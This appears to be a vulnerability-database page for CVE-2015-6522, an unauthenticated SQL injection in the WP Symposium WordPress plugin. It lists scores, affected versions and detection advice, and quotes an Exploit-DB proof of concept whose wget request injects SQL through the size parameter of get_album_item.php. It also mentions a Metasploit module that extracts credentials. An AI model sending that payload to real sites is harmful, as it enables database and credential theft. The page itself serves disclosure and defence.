CVE-2015-6522
published 2015-08-19CVE-2015-6522: SQL injection vulnerability in the WP Symposium plugin before 15.8 for WordPress allows remote attackers to execute arbitrary SQL commands via the size…
PriorityP271high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
74.13%
99.4th percentile
SQL injection vulnerability in the WP Symposium plugin before 15.8 for WordPress allows remote attackers to execute arbitrary SQL commands via the size parameter to get_album_item.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wpsymposium | wp_symposium | <= 15.7 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests targeting /wp-content/plugins/wp-symposium/get_album_item.php with a non-integer or SQL-laden 'size' parameter, which is the injection point for this unauthenticated SQLi. ↗
- →The vulnerability is unauthenticated — no session or login cookie is required. Any GET request to get_album_item.php with a manipulated size parameter should be treated as suspicious. ↗
- →The Metasploit auxiliary module wp_symposium_sql_injection targets credential extraction via this endpoint; presence of this module's traffic patterns (automated sequential requests to get_album_item.php) indicates active exploitation. ↗
- ·The vulnerability affects WP Symposium plugin versions before 15.8 only. Version 15.8 (released 2015-08-07) contains the patch; ensure the installed version is confirmed before treating traffic as malicious. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin WP Symposium 15.1 - 'get_album_item.php' SQL Injection
exploitdb·2015-08-18
CVE-2015-6522 WordPress Plugin WP Symposium 15.1 - 'get_album_item.php' SQL Injection
WordPress Plugin WP Symposium 15.1 - 'get_album_item.php' SQL Injection
---
# Exploit Title: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability
# Date: 2015-07-30
# Exploit Author: PizzaHatHacker
# Vendor Homepage: http://www.wpsymposium.com/
# Version: ? /wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--
PoC Command (Unix) : wget "http://localhost//wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt
In the content of the HTTP response you will find the MySQL version, for example :
5.5.44-0+deb7u1
6. Vulnerability Timeline
2015-05 : Vulnerability identified
2015-07-30 : Vendor informed about this issue
2015-07-30 : Vendor confirms the issue
2015-08-04 : Ask for a delay to deploy the fix
2015-0
Metasploit
WordPress Symposium Plugin SQL Injection
metasploit
WordPress Symposium Plugin SQL Injection
WordPress Symposium Plugin SQL Injection
This module exploits a SQL injection vulnerability in the WP Symposium plugin before 15.8 for WordPress, which allows remote attackers to extract credentials via the size parameter to get_album_item.php.
No writeups or analysis indexed.
2015-08-19
Published